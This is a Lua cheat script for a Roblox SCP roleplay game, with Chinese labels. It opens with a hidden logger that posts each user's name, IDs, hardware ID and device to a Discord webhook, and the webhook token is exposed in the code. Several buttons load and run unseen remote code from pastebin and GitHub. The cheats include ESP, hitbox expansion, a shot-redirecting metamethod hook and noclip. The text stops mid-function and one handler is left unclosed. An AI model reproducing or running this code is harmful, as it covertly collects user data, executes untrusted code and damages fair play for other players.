local webhookUrl = "https://discord.com/api/webhooks/1451747306809594054/TfI_CE9JzbRDoZ5UwUlGhmFh5J-LBMkuKWNTaR_-NXruRcSPisuUNLExYBHZC4XzJBjJ"
local player = game:GetService("Players").LocalPlayer
local joinDate = os.date("!*t", os.time() - player.AccountAge * 86400)
local joinDateFormatted = joinDate.year .. "/" .. joinDate.month .. "/" .. joinDate.day

local deviceType = "Unknown"
if game:GetService("UserInputService").KeyboardEnabled and game:GetService("UserInputService").MouseEnabled then
    deviceType = "模拟器/PC"
elseif game:GetService("UserInputService").TouchEnabled then
    deviceType = "IOS/Android"
else
    deviceType = "未知设备"
end

local executorName = identifyexecutor() or "Unknown"

local avatarUrl = "https://via.placeholder.com/180x180"
local success, avatarData = pcall(function()
    return game:HttpGet(string.format("https://thumbnails.roblox.com/v1/users/avatar?userIds=%d&size=180x180&format=Png&isCircular=true", player.UserId))
end)

if success then
    local httpService = game:GetService("HttpService")
    local avatarJson = httpService:JSONDecode(avatarData)
    if avatarJson and avatarJson.data and avatarJson.data[1] then
        avatarUrl = avatarJson.data[1].imageUrl
    end
end

local placeName = "未知"
local success, result = pcall(function()
    return game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name
end)
if success then
    placeName = result
end

local hwid = "未知"
if type(gethwid) == "function" then
    hwid = gethwid() or "未知"
end

local clientId = "未知"
local success, result = pcall(function()
    return game:GetService("RbxAnalyticsService"):GetClientId()
end)
if success then
    clientId = result
end

local webhookData = {
    username = "bot",
    embeds = {
        {
            color = tonumber("0x32CD32"),
            title = "有人使用了空云脚本",
            thumbnail = {url = avatarUrl},
            fields = {
                {name = "名称(Name)", value = player.Name, inline = true},
                {name = "昵称(DisplayName)", value = player.DisplayName, inline = true},
                {name = "UserId", value = "[" .. player.UserId .. "](https://www.roblox.com/users/" .. player.UserId .. "/profile)", inline = true},
                {name = "地图ID", value = "[" .. game.PlaceId .. "](https://www.roblox.com/games/" .. game.PlaceId .. ")", inline = true},
                {name = "地图名称", value = placeName, inline = true},
                {name = "使用的注入器", value = executorName, inline = true},
                {name = "账号年龄", value = player.AccountAge .. "天", inline = true},
                {name = "加入日期", value = joinDateFormatted, inline = true},
                {name = "HWID", value = hwid, inline = true},
                {name = "客户端ID", value = clientId, inline = false},
                {name = "设备", value = deviceType, inline = false}
            }
        }
    }
}

local requestFunc = syn and syn.request or http_request or request
if requestFunc then
    pcall(function()
        requestFunc({
            Url = webhookUrl,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = game:GetService("HttpService"):JSONEncode(webhookData)
        })
    end)
end

-- 这里继续您的脚本主要代码
game:GetService("StarterGui"):SetCore("SendNotification", {
  Title = "空云脚本 - SCP角色扮演",
  Text = "欢迎使用空云脚本",
  Duration = 4,
  Callback = bindable,
  Button1 = "感谢您的使用",
})
wait(3)
game:GetService("StarterGui"):SetCore("SendNotification", {
  Title = "正在加载中",
  Text = "慢慢等待",
  Duration = 4,
  Callback = bindable,
  Button1 = "看到这个代表能用了",
})
wait(4)

local library = loadstring(game:HttpGet("https://raw.githubusercontent.com/renlua/block/main/UI/%E5%BD%A9%E8%99%B9UI.lua", true))()
----------------------------------------------------------------------------------------------------------------------------------------
local window = library:new("空云脚本 - SCP角色扮演")--V2.1.3
----------------------------------------------------------------------------------------------------------------------------------------
local main = window:Tab("通用(不会封号)", "17493876383")--1
local main9178 = window:Tab("脚本", "17493876383")--1
local main7891 = window:Tab("范围2.0", "17493876383")--1
local main1111 = window:Tab("自制功能", "17493876383")--1
local main9191 = window:Tab("透视SCP", "17493876383")--1
print("🔘🔘功能-加载成功！")
----------------------------------------------------------------------------------------------------------------------------------------
local LOL = main:section("必看⚠️⚠️⚠️", false)
local AKAJK = main:section("玩家", false)
local Player = main:section("通用", false)
local teles = main:section("ESP", false)
print("☑☑️功能-验证成功")
----------------------------------------------------------------------------------------------------------------------------------------
local settings = {
    Color = Color3.fromRGB(255, 0, 0),
    Size = 15,
    Transparency = 1, 
    AutoScale = true,
    ESPEnabled = false
}

local space = game:GetService("Workspace")
local players = game:GetService("Players")
local player = players.LocalPlayer
local camera = space.CurrentCamera
local espConnections = {}

local function NewText(color, size, transparency)
    local text = Drawing.new("Text")
    text.Visible = false
    text.Text = ""
    text.Position = Vector2.new(0, 0)
    text.Color = color
    text.Size = size
    text.Center = true
    text.Transparency = transparency
    return text
end

local function SetVisibility(state, library)
    for _, textObject in pairs(library) do
        textObject.Visible = state
    end
end

local function SetSize(size, library)
    for _, textObject in pairs(library) do
        textObject.Size = size
    end
end

local function CreateESP(playerToTrack)
    local library = {
        name = NewText(settings.Color, settings.Size, settings.Transparency)
    }

    local function UpdateESP()
        local connection
        connection = game:GetService("RunService").RenderStepped:Connect(function()
            if settings.ESPEnabled and playerToTrack.Character and playerToTrack.Character:FindFirstChild("Humanoid") and playerToTrack.Character:FindFirstChild("HumanoidRootPart") then
                if playerToTrack.Name ~= player.Name and playerToTrack.Character.Humanoid.Health > 0 then
                    local HumanoidRootPart_Pos, OnScreen = camera:WorldToViewportPoint(playerToTrack.Character.HumanoidRootPart.Position)
                    if OnScreen then
                        library.name.Text = playerToTrack.Name
                        library.name.Position = Vector2.new(HumanoidRootPart_Pos.X, HumanoidRootPart_Pos.Y)

                        if settings.AutoScale then
                            local distance = (camera.CFrame.Position - playerToTrack.Character.HumanoidRootPart.Position).Magnitude
                            local textSize = math.clamp(1000 / distance, 2, 30)
                            SetSize(textSize, library)
                        else
                            SetSize(settings.Size, library)
                        end

                        SetVisibility(true, library)
                    else
                        SetVisibility(false, library)
                    end
                else
                    SetVisibility(false, library)
                end

                if not players:FindFirstChild(playerToTrack.Name) then
                    connection:Disconnect()
                end
            else
                SetVisibility(false, library)
            end
        end)
        table.insert(espConnections, connection)
    end

    coroutine.wrap(UpdateESP)()
end

local function ToggleESP(state)
    settings.ESPEnabled = state
    if state then
        for _, v in pairs(players:GetPlayers()) do
            if v ~= player then
                CreateESP(v)
            end
        end

        players.PlayerAdded:Connect(function(newPlayer)
            if newPlayer ~= player then
                CreateESP(newPlayer)
            end
        end)
    else
        for _, connection in pairs(espConnections) do
            connection:Disconnect()
        end
        espConnections = {}
    end
end
----------------------------------------------------------------------------------------------------------------------------------------
LOL:Label("注⚠️⚠️⚠️：快速跑步推荐设置到0.01~0.3不然被检测到会重生")
LOL:Label("你的注入器:"..identifyexecutor())
LOL:Label("当前服务器ID:" .. game.GameId .. " ")
LOL:Label("你的用户名" .. game.Players.LocalPlayer.Name .. " ")
LOL:Label("空云脚本的创作者空云 QQ3126295205")
LOL:Label("空云脚本1群号942272935")
LOL:Button(
    "复制到空云脚本①群号",
    function()
        setclipboard("942272935")
    end
)
LOL:Toggle(
    "显示空云脚本作者（检测在不在服务器中）",
    "",
    true,
    function(Value)
        if Value then
            local creatorName = "CN_917686666"
            local Players = game:GetService("Players")
            local LocalPlayer = Players.LocalPlayer
            
            local function createBillboard(player)
                if player.Name == creatorName and player ~= LocalPlayer then
                    local character = player.Character or player.CharacterAdded:Wait()
                    local head = character:WaitForChild("Head")
                    
                    local billboard = Instance.new("BillboardGui")
                    billboard.Name = "CreatorTag"
                    billboard.Adornee = head
                    billboard.Size = UDim2.new(0, 100, 0, 40)
                    billboard.StudsOffset = Vector3.new(0, 3, 0)
                    billboard.AlwaysOnTop = true
                    billboard.Parent = head
                    
                    local label = Instance.new("TextLabel")
                    label.Size = UDim2.new(1, 0, 1, 0)
                    label.BackgroundTransparency = 1
                    label.Text = "空云脚本开发者"
                    label.TextColor3 = Color3.fromRGB(0, 255, 0)
                    label.TextSize = 14
                    label.Font = Enum.Font.GothamBold
                    label.Parent = billboard
                    
                    player.CharacterAdded:Connect(function(newChar)
                        billboard.Adornee = newChar:WaitForChild("Head")
                    end)
                    
                    return billboard
                end
            end
            
            local function checkAndCreate()
                for _, player in pairs(Players:GetPlayers()) do
                    if player.Name == creatorName and player ~= LocalPlayer then
                        createBillboard(player)
                    end
                end
            end
            
            checkAndCreate()
            
            local playerAddedConn = Players.PlayerAdded:Connect(function(player)
                if player.Name == creatorName and player ~= LocalPlayer then
                    createBillboard(player)
                end
            end)
            
            local playerRemovingConn = Players.PlayerRemoving:Connect(function(player)
                if player.Name == creatorName and player.Character then
                    local head = player.Character:FindFirstChild("Head")
                    if head then
                        local billboard = head:FindFirstChild("CreatorTag")
                        if billboard then
                            billboard:Destroy()
                        end
                    end
                end
            end)
            
            _G.CreatorDisplay = {
                PlayerAdded = playerAddedConn,
                PlayerRemoving = playerRemovingConn
            }
        else
            if _G.CreatorDisplay then
                _G.CreatorDisplay.PlayerAdded:Disconnect()
                _G.CreatorDisplay.PlayerRemoving:Disconnect()
                _G.CreatorDisplay = nil
            end
            
            local Players = game:GetService("Players")
            for _, player in pairs(Players:GetPlayers()) do
                if player.Character then
                    local head = player.Character:FindFirstChild("Head")
                    if head then
                        local billboard = head:FindFirstChild("CreatorTag")
                        if billboard then
                            billboard:Destroy()
                        end
                    end
                end
            end
        end
    end
)
----------------------------------------------------------------------------------------------------------------------------------------

--[[AKAJK:Textbox("设置速度", "文本", "输入的", "文本", function(Value)
    print("Value")
end)
]]
AKAJK:Textbox("设置快速跑步", "run", "输入", function(speedValue)
    Speed = speedValue
end)

AKAJK:Toggle("开启快速跑步(开/关)", "switch", false, function(enabled)
    if enabled == true then
        sudu = game:GetService("RunService").Heartbeat:Connect(function()
            if game:GetService("Players").LocalPlayer.Character and 
               game:GetService("Players").LocalPlayer.Character.Humanoid and 
               game:GetService("Players").LocalPlayer.Character.Humanoid.Parent and 
               game:GetService("Players").LocalPlayer.Character.Humanoid.MoveDirection.Magnitude > 0 then
                game:GetService("Players").LocalPlayer.Character:TranslateBy(game:GetService("Players").LocalPlayer.Character.Humanoid.MoveDirection * Speed / 0.5)
            end
        end)
    elseif not enabled and sudu then
        sudu:Disconnect()
        sudu = nil
    end
end)
AKAJK:Slider(
    "血量",
    "",
    100,
    1,
    999999999,
    false,
    function(Value)
        game.Players.LocalPlayer.Character.Humanoid.Health = Value
    end
)
Player:Toggle(
    "穿墙",
    "text",
    false,  -- 默认关闭
    function(Value)
        if Value then
            local Player = game:GetService("Players").LocalPlayer
            local Character = Player.Character or Player.CharacterAdded:Wait()
            local Humanoid = Character:WaitForChild("Humanoid")
            
            local NoclipConnection
            
            local function NoclipLoop()
                if Character then
                    for _, part in pairs(Character:GetDescendants()) do
                        if part:IsA("BasePart") then
                            part.CanCollide = false
                        end
                    end
                end
            end
            
            -- 开启穿墙
            NoclipConnection = game:GetService("RunService").Stepped:Connect(NoclipLoop)
            
            -- 角色重生时重新连接
            Player.CharacterAdded:Connect(function(newCharacter)
                Character = newCharacter
                Humanoid = Character:WaitForChild("Humanoid")
                
                -- 重新启用穿墙
                if NoclipConnection then
                    NoclipConnection:Disconnect()
                end
                NoclipConnection = game:GetService("RunService").Stepped:Connect(NoclipLoop)
            end)
        else
            -- 关闭穿墙
            if NoclipConnection then
                NoclipConnection:Disconnect()
                NoclipConnection = nil
            end
            -- 恢复碰撞
            local Player = game:GetService("Players").LocalPlayer
            if Player.Character then
                for _, part in pairs(Player.Character:GetDescendants()) do
                    if part:IsA("BasePart") then
                        part.CanCollide = true
                    end
                end
            end
        end
    end
)

AKAJK:Slider('缩放距离', 'ZOOOOOM OUT!',  128, 128, 200000,false, function(value)
    game:GetService("Players").LocalPlayer.CameraMaxZoomDistance = value
    end)
AKAJK:Slider('视界（正常70）', 'Sliderflag', 70, 0.1, 250, false, function(v)
        game.Workspace.CurrentCamera.FieldOfView = v
    end)
Player:Button(
    "范围",
    function()
        _G.HeadSize = 20
_G.Disabled = true

game:GetService('RunService').RenderStepped:connect(function()
if _G.Disabled then
for i,v in next, game:GetService('Players'):GetPlayers() do
if v.Name ~= game:GetService('Players').LocalPlayer.Name then
pcall(function()
v.Character.HumanoidRootPart.Size = Vector3.new(_G.HeadSize,_G.HeadSize,_G.HeadSize)
v.Character.HumanoidRootPart.Transparency = 0.7
v.Character.HumanoidRootPart.BrickColor = BrickColor.new("Really blue")
v.Character.HumanoidRootPart.Material = "Neon"
v.Character.HumanoidRootPart.CanCollide = false
end)
end
end
end
end)
    end
)

Player:Button(
    "中级范围",
    function()
        _G.HeadSize = 100
_G.Disabled = true

game:GetService('RunService').RenderStepped:connect(function()
if _G.Disabled then
for i,v in next, game:GetService('Players'):GetPlayers() do
if v.Name ~= game:GetService('Players').LocalPlayer.Name then
pcall(function()
v.Character.HumanoidRootPart.Size = Vector3.new(_G.HeadSize,_G.HeadSize,_G.HeadSize)
v.Character.HumanoidRootPart.Transparency = 0.7
v.Character.HumanoidRootPart.BrickColor = BrickColor.new("Really red")
v.Character.HumanoidRootPart.Material = "Neon"
v.Character.HumanoidRootPart.CanCollide = false
end)
end
end
end
end)
    end
)
Player:Button(
    "高级范围",
    function()
        _G.HeadSize = 500
_G.Disabled = true

game:GetService('RunService').RenderStepped:connect(function()
if _G.Disabled then
for i,v in next, game:GetService('Players'):GetPlayers() do
if v.Name ~= game:GetService('Players').LocalPlayer.Name then
pcall(function()
v.Character.HumanoidRootPart.Size = Vector3.new(_G.HeadSize,_G.HeadSize,_G.HeadSize)
v.Character.HumanoidRootPart.Transparency = 0.7
v.Character.HumanoidRootPart.BrickColor = BrickColor.new("Really red")
v.Character.HumanoidRootPart.Material = "Neon"
v.Character.HumanoidRootPart.CanCollide = false
end)
end
end
end
end)
    end
)

teles:Toggle("人物显示", "", false, function(state)
getgenv().enabled = state --Toggle on/off
getgenv().filluseteamcolor = true --Toggle fill color using player team color on/off
getgenv().outlineuseteamcolor = true --Toggle outline color using player team color on/off
getgenv().fillcolor = Color3.new(1, 0, 0) --Change fill color, no need to edit if using team color
getgenv().outlinecolor = Color3.new(1, 1, 1) --Change outline color, no need to edit if using team color
getgenv().filltrans = 0.5 --Change fill transparency
getgenv().outlinetrans = 0.5 --Change outline transparency

loadstring(game:HttpGet("https://raw.githubusercontent.com/Vcsk/RobloxScripts/main/Highlight-ESP.lua"))()
end)
teles:Toggle("ESP显示名称", "", false, function(state)
ToggleESP(state)
end)

local teleporte = main9178:section("脚本", false)
teleporte:Button("变车",function()
loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-FE-Car-Gui-50947"))()
end)
teleporte:Button("撸管r6",function()
loadstring(game:HttpGet("https://pastefy.app/wa3v2Vgm/raw"))()
end)
teleporte:Button("撸管r15",function()
loadstring(game:HttpGet("https://pastefy.app/YZoglOyJ/raw"))()
end)

local rangeSection = main7891:section("范围设置", false)

-- 范围功能配置
local StarterGui = game:GetService("StarterGui")
local Players = game:GetService("Players")
getgenv().HitboxSize = 15
getgenv().HitboxTransparency = 0.9
getgenv().HitboxStatus = false
getgenv().TeamCheck = false

-- 颜色配置
MovementConfig = MovementConfig or {}
MovementConfig.HitboxBrickColor = "Really blue"

rangeSection:Label("范围设置")
rangeSection:Toggle("开启/关闭范围", "HitboxStatus", false, function(enabled)
    getgenv().HitboxStatus = enabled
    game:GetService("RunService").RenderStepped:connect(function()
        if HitboxStatus == true and TeamCheck == false then
            for _, player in next, game:GetService("Players"):GetPlayers() do
                if player.Name ~= game:GetService("Players").LocalPlayer.Name then
                    pcall(function()
                        player.Character.HumanoidRootPart.Size = Vector3.new(HitboxSize, HitboxSize, HitboxSize)
                        player.Character.HumanoidRootPart.Transparency = HitboxTransparency
                        player.Character.HumanoidRootPart.BrickColor = BrickColor.new(MovementConfig.HitboxBrickColor)
                        player.Character.HumanoidRootPart.Material = "Neon"
                        player.Character.HumanoidRootPart.CanCollide = false
                    end)
                end
            end
        elseif HitboxStatus == true and TeamCheck == true then
            for _, player in next, game:GetService("Players"):GetPlayers() do
                if game:GetService("Players").LocalPlayer.Team ~= player.Team then
                    pcall(function()
                        player.Character.HumanoidRootPart.Size = Vector3.new(HitboxSize, HitboxSize, HitboxSize)
                        player.Character.HumanoidRootPart.Transparency = HitboxTransparency
                        player.Character.HumanoidRootPart.BrickColor = BrickColor.new(MovementConfig.HitboxBrickColor)
                        player.Character.HumanoidRootPart.Material = "Neon"
                        player.Character.HumanoidRootPart.CanCollide = false
                    end)
                end
            end
        else
            for _, player in next, game:GetService("Players"):GetPlayers() do
                if player.Name ~= game:GetService("Players").LocalPlayer.Name then
                    pcall(function()
                        player.Character.HumanoidRootPart.Size = Vector3.new(2, 2, 1)
                        player.Character.HumanoidRootPart.Transparency = 1
                        player.Character.HumanoidRootPart.BrickColor = BrickColor.new(MovementConfig.HitboxBrickColor)
                        player.Character.HumanoidRootPart.Material = "Plastic"
                        player.Character.HumanoidRootPart.CanCollide = false
                    end)
                end
            end
        end
    end)
end)

rangeSection:Textbox("范围大小设置", "HitboxSize", "输入", function(size)
    getgenv().HitboxSize = size
end)

rangeSection:Toggle("队伍检测", "TeamCheck", false, function(enabled)
    getgenv().TeamCheck = enabled
end)

rangeSection:Textbox("范围透明度设置（调0更好区分队伍)", "HitboxTransparency", "输入", function(transparency)
    getgenv().HitboxTransparency = transparency
end)

rangeSection:Dropdown("选择范围颜色", "Hitbox", {
    "Really blue",
    "Really black",
    "Really red",
    "Really pink",
    "Really brown",
    "Really yellow",
    "Really green",
    "Really orange",
    "Really purple",
    "Really light gray"
}, function(color)
    MovementConfig.HitboxBrickColor = color
end)

-- 快捷设置范围
local QuickSettingsSection = main7891:section("快捷设置范围", true)
QuickSettingsSection:Label("快捷范围设置")

QuickSettingsSection:Button("范围清空", function()
    loadstring(game:HttpGet("https://pastebin.com/raw/RqrTrPF5"))()
end)

QuickSettingsSection:Button("范围10", function()
    loadstring(game:HttpGet("https://pastebin.com/raw/DT94B37a"))()
end)

QuickSettingsSection:Button("范围20", function()
    loadstring(game:HttpGet("https://pastebin.com/raw/Kyyt1e4g"))()
end)

QuickSettingsSection:Button("范围50", function()
    loadstring(game:HttpGet("https://pastebin.com/raw/pMtKEgWd"))()
end)

QuickSettingsSection:Button("范围100", function()
    loadstring(game:HttpGet("https://pastebin.com/raw/aLBSXPYE"))()
end)

QuickSettingsSection:Button("范围150", function()
    loadstring(game:HttpGet("https://pastebin.com/raw/RWxsQuU9"))()
end)

QuickSettingsSection:Button("范围200", function()
    loadstring(game:HttpGet("https://pastebin.com/raw/hbp3RV2p"))()
end)

QuickSettingsSection:Button("范围300", function()
    loadstring(game:HttpGet("https://pastebin.com/raw/x8cZhegq"))()
end)

QuickSettingsSection:Button("范围400", function()
    loadstring(game:HttpGet("https://pastebin.com/raw/LixK0gG3"))()
end)

QuickSettingsSection:Button("范围500", function()
    loadstring(game:HttpGet("https://pastebin.com/raw/yXWMGLYJ"))()
end)

local teleports6 = main1111:section("功能", false)
teleports6:Button("围墙自动破坏（不推荐开）", function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/xiaoSB33/M416/refs/heads/main/Wind/sb/666"))()
end)
local nchook
local shotHookEnabled = false

teleports6:Toggle(
    "打身体改打头",
    "text",
    false,
    function(Value)
        if Value then
            -- 开启自瞄
            shotHookEnabled = true
            nchook = hookmetamethod(game, "__namecall", newcclosure(function(self, ...)
                if not shotHookEnabled then
                    return nchook(self, ...)
                end
                
                local args = {...} 
                if (not checkcaller()) and tostring(self.Name) == "ShotRemote" and args[2] then 
                    local x = args[2].Parent:FindFirstChild("Head") 
                    local z = args[2].Parent.Parent:FindFirstChild("Head") 
                    local y = args[2].Parent.Parent.Parent:FindFirstChild("Head") 
                    local q = {x, y, z} 
                    for i,v in pairs(q) do 
                        if v == nil then 
                            table.remove(q, i)
                        end 
                    end 
                    if q[1] then
                        args[1] = {
                            q[1].Position.X, 
                            q[1].Position.Y,
                            q[1].Position.Z,
                        }
                        args[2] = q[1] 
                        return self.FireServer(self, unpack(args))
                    end
                end 
                return nchook(self, ...)
            end))
        else
            -- 关闭自瞄
            shotHookEnabled = false
            if nchook then
                unhookmetamethod(game, "__namecall", nchook)
                nchook = nil
            end
        end
    end
)

local teleportss = main9191:section("透视", false)
teleportss:Button("透视173",function()
local function ESP(model, Name, color)
    if not model or (not model:IsA("Model") and not model:IsA("BasePart")) then 
        return 
    end
    
    local head
    if model:IsA("BasePart") then
        head = model
    else
        head = model:FindFirstChild("Head") 
            or model:FindFirstChild("HumanoidRootPart") 
            or model:FindFirstChildWhichIsA("BasePart")
    end
    
    if not head then return end
    
    local billboardName = "ModelESP"
    local existingBillboard = head:FindFirstChild(billboardName)
    local billboard = existingBillboard or Instance.new("BillboardGui")
    local textLabel = billboard:FindFirstChild("TextLabel") or Instance.new("TextLabel")

    billboard.Name = billboardName
    billboard.Adornee = head
    billboard.Size = UDim2.new(0, 100, 0, 50)
    billboard.StudsOffset = Vector3.new(0, 3, 0)
    billboard.AlwaysOnTop = true

    textLabel.Name = "TextLabel"
    textLabel.Size = UDim2.new(1, 0, 1, 0)
    textLabel.BackgroundTransparency = 1
    textLabel.TextStrokeTransparency = 0
    textLabel.TextSize = 14
    textLabel.Font = Enum.Font.SourceSansBold
    textLabel.Text = (model.Name or "Part").."\n["..Name.."]"
    textLabel.TextColor3 = color or Color3.new(1, 0, 0)
    textLabel.Parent = billboard

    if not existingBillboard then
        billboard.Parent = head
    end

    if model:IsA("Model") then
        for _, part in pairs(model:GetDescendants()) do
            if part:IsA("BasePart") then
                part.LocalTransparencyModifier = 0
            end
        end
    elseif model:IsA("BasePart") then
        model.LocalTransparencyModifier = 0
    end
end

ESP(workspace.SCPs["SCP-173"].HumanoidRootPart, "SCP（173）", Color3.new(0, 1, 0))
end)
teleportss:Button("透视096",function()
local function ESP(model, Name, color)
    if not model or (not model:IsA("Model") and not model:IsA("BasePart")) then 
        return 
    end
    
    local head
    if model:IsA("BasePart") then
        head = model
    else
        head = model:FindFirstChild("Head") 
            or model:FindFirstChild("HumanoidRootPart") 
            or model:FindFirstChildWhichIsA("BasePart")
    end
    
    if not head then return end
    
    local billboardName = "ModelESP"
    local existingBillboard = head:FindFirstChild(billboardName)
    local billboard = existingBillboard or Instance.new("BillboardGui")
    local textLabel = billboard:FindFirstChild("TextLabel") or Instance.new("TextLabel")

    billboard.Name = billboardName
    billboard.Adornee = head
    billboard.Size = UDim2.new(0, 100, 0, 50)
    billboard.StudsOffset = Vector3.new(0, 3, 0)
    billboard.AlwaysOnTop = true

    textLabel.Name = "TextLabel"
    textLabel.Size = UDim2.new(1, 0, 1, 0)
    textLabel.BackgroundTransparency = 1
    textLabel.TextStrokeTransparency = 0
    textLabel.TextSize = 14
    textLabel.Font = Enum.Font.SourceSansBold
    textLabel.Text = (model.Name or "Part").."\n["..Name.."]"
    textLabel.TextColor3 = color or Color3.new(1, 0, 0)
    textLabel.Parent = billboard

    if not existingBillboard then
        billboard.Parent = head
    end

    if model:IsA("Model") then
        for _, part in pairs(model:GetDescendants()) do
            if part:IsA("BasePart") then
                part.LocalTransparencyModifier = 0
            end
        end
    elseif model:IsA("BasePart") then
        model.LocalTransparencyModifier = 0
    end
end

ESP(workspace.SCPs["SCP-096"].Torso, "SCP（096）", Color3.new(0, 1, 0))
end)

teleportss:Button("透视066",function()
local function ESP(model, Name, color)
    if not model or (not model:IsA("Model") and not model:IsA("BasePart")) then 
        return 
    end
    
    local head
    if model:IsA("BasePart") then
        head = model
    else
        head = model:FindFirstChild("Head") 
            or model:FindFirstChild("HumanoidRootPart") 
            or model:FindFirstChildWhichIsA("BasePart")
    end
    
    if not head then return end
    
    local billboardName = "ModelESP"
    local existingBillboard = head:FindFirstChild(billboardName)
    local billboard = existingBillboard or Instance.new("BillboardGui")
    local textLabel = billboard:FindFirstChild("TextLabel") or Instance.new("TextLabel")

    billboard.Name = billboardName
    billboard.Adornee = head
    billboard.Size = UDim2.new(0, 100, 0, 50)
    billboard.StudsOffset = Vector3.new(0, 3, 0)
    billboard.AlwaysOnTop = true

    textLabel.Name = "TextLabel"
    textLabel.Size = UDim2.new(1, 0, 1, 0)
    textLabel.BackgroundTransparency = 1
    textLabel.TextStrokeTransparency = 0
    textLabel.TextSize = 14
    textLabel.Font = Enum.Font.SourceSansBold
    textLabel.Text = (model.Name or "Part").."\n["..Name.."]"
    textLabel.TextColor3 = color or Color3.new(1, 0, 0)
    textLabel.Parent = billboard

    if not existingBillboard then
        billboard.Parent = head
    end

    if model:IsA("Model") then
        for _, part in pairs(model:GetDescendants()) do
            if part:IsA("BasePart") then
                part.LocalTransparencyModifier = 0
            end
        end
    elseif model:IsA("BasePart") then
        model.LocalTransparencyModifier = 0
    end
end

ESP(workspace.SCPs["SCP-066"].Body, "SCP（066）", Color3.new(0, 1, 0))
end)

teleportss:Button("透视076",function()
local function ESP(model, Name, color)
    if not model or (not model:IsA("Model") and not model:IsA("BasePart")) then 
        return 
    end
    
    local head
    if model:IsA("BasePart") then
        head = model
    else
        head = model:FindFirstChild("Head") 
            or model:FindFirstChild("HumanoidRootPart") 
            or model:FindFirstChildWhichIsA("BasePart")
    end
    
    if not head then return end
    
    local billboardName = "ModelESP"
    local existingBillboard = head:FindFirstChild(billboardName)
    local billboard = existingBillboard or Instance.new("BillboardGui")
    local textLabel = billboard:FindFirstChild("TextLabel") or Instance.new("TextLabel")

    billboard.Name = billboardName
    billboard.Adornee = head
    billboard.Size = UDim2.new(0, 100, 0, 50)
    billboard.StudsOffset = Vector3.new(0, 3, 0)
    billboard.AlwaysOnTop = true

    textLabel.Name = "TextLabel"
    textLabel.Size = UDim2.new(1, 0, 1, 0)
    textLabel.BackgroundTransparency = 1
    textLabel.TextStrokeTransparency = 0
    textLabel.TextSize = 14
    textLabel.Font = Enum.Font.SourceSansBold
    textLabel.Text = (model.Name or "Part").."\n["..Name.."]"
    textLabel.TextColor3 = color or Color3.new(1, 0, 0)
    textLabel.Parent = billboard

    if not existingBillboard then
        billboard.Parent = head
    end

    if model:IsA("Model") then
        for _, part in pairs(model:GetDescendants()) do
            if part:IsA("BasePart") then
                part.LocalTransparencyModifier = 0
            end
        end
    elseif model:IsA("BasePart") then
        model.LocalTransparencyModifier = 0
    end
end

teleportss:Button("透视131-2",function()
local function ESP(model, Name, color)
    if not model or (not model:IsA("Model") and not model:IsA("BasePart")) then 
        return 
    end
    
    local head
    if model:IsA("BasePart") then
        head = model
    else
        head = model:FindFirstChild("Head") 
            or model:FindFirstChild("HumanoidRootPart") 
            or model:FindFirstChildWhichIsA("BasePart")
    end
    
    if not head then return end
    
    local billboardName = "ModelESP"
    local existingBillboard = head:FindFirstChild(billboardName)
    local billboard = existingBillboard or Instance.new("BillboardGui")
    local textLabel = billboard:FindFirstChild("TextLabel") or Instance.new("TextLabel")

    billboard.Name = billboardName
    billboard.Adornee = head
    billboard.Size = UDim2.new(0, 100, 0, 50)
    billboard.StudsOffset = Vector3.new(0, 3, 0)
    billboard.AlwaysOnTop = true

    textLabel.Name = "TextLabel"
    textLabel.Size = UDim2.new(1, 0, 1, 0)
    textLabel.BackgroundTransparency = 1
    textLabel.TextStrokeTransparency = 0
    textLabel.TextSize = _G.ESPTextSize or 14
    textLabel.Font = Enum.Font.SourceSansBold
    textLabel.Text = (model.Name or "Part").."\n["..Name.."]"
    textLabel.TextColor3 = color or Color3.new(1, 0, 0)
    textLabel.Parent = billboard

    if not existingBillboard then
        billboard.Parent = head
    end

    if model:IsA("Model") then
        for _, part in pairs(model:GetDescendants()) do
            if part:IsA("BasePart") then
                part.LocalTransparencyModifier = 0
            end
        end
    elseif model:IsA("BasePart") then
        model.LocalTransparencyModifier = 0
    end
end

--[[
    使用示例：
    ESP(输入模型名称, "输入名称", Color3.new(0, 1, 0))
]]
ESP(workspace.SCPs["SCP-131"].Red.HumanoidRootPart, "SCP（131-2）", Color3.new(0, 1, 0))
end)

teleportss:Button("透视131",function()
local function ESP(model, Name, color)
    if not model or (not model:IsA("Model") and not model:IsA("BasePart")) then 
        return 
    end
    
    local head
    if model:IsA("BasePart") then
        head = model
    else
        head = model:FindFirstChild("Head") 
            or model:FindFirstChild("HumanoidRootPart") 
            or model:FindFirstChildWhichIsA("BasePart")
    end
    
    if not head then return end
    
    local billboardName = "ModelESP"
    local existingBillboard = head:FindFirstChild(billboardName)
    local billboard = existingBillboard or Instance.new("BillboardGui")
    local textLabel = billboard:FindFirstChild("TextLabel") or Instance.new("TextLabel")

    billboard.Name = billboardName
    billboard.Adornee = head
    billboard.Size = UDim2.new(0, 100, 0, 50)
    billboard.StudsOffset = Vector3.new(0, 3, 0)
    billboard.AlwaysOnTop = true

    textLabel.Name = "TextLabel"
    textLabel.Size = UDim2.new(1, 0, 1, 0)
    textLabel.BackgroundTransparency = 1
    textLabel.TextStrokeTransparency = 0
    textLabel.TextSize = _G.ESPTextSize or 14
    textLabel.Font = Enum.Font.SourceSansBold
    textLabel.Text = (model.Name or "Part").."\n["..Name.."]"
    textLabel.TextColor3 = color or Color3.new(1, 0, 0)
    textLabel.Parent = billboard

    if not existingBillboard then
        billboard.Parent = head
    end

    if model:IsA("Model") then
        for _, part in pairs(model:GetDescendants()) do
            if part:IsA("BasePart") then
                part.LocalTransparencyModifier = 0
            end
        end
    elseif model:IsA("BasePart") then
        model.LocalTransparencyModifier = 0
    end
end

--[[
    使用示例：
    ESP(输入模型名称, "输入名称", Color3.new(0, 1, 0))
]]
ESP(workspace.SCPs["SCP-131"]:GetChildren()[3].HumanoidRootPart, "SCP（131）", Color3.new(0, 1, 0))
end)

teleportss:Button("透视131-1",function()
local function ESP(model, Name, color)
    if not model or (not model:IsA("Model") and not model:IsA("BasePart")) then 
        return 
    end
    
    local head
    if model:IsA("BasePart") then
        head = model
    else
        head = model:FindFirstChild("Head") 
            or model:FindFirstChild("HumanoidRootPart") 
            or model:FindFirstChildWhichIsA("BasePart")
    end
    
    if not head then return end
    
    local billboardName = "ModelESP"
    local existingBillboard = head:FindFirstChild(billboardName)
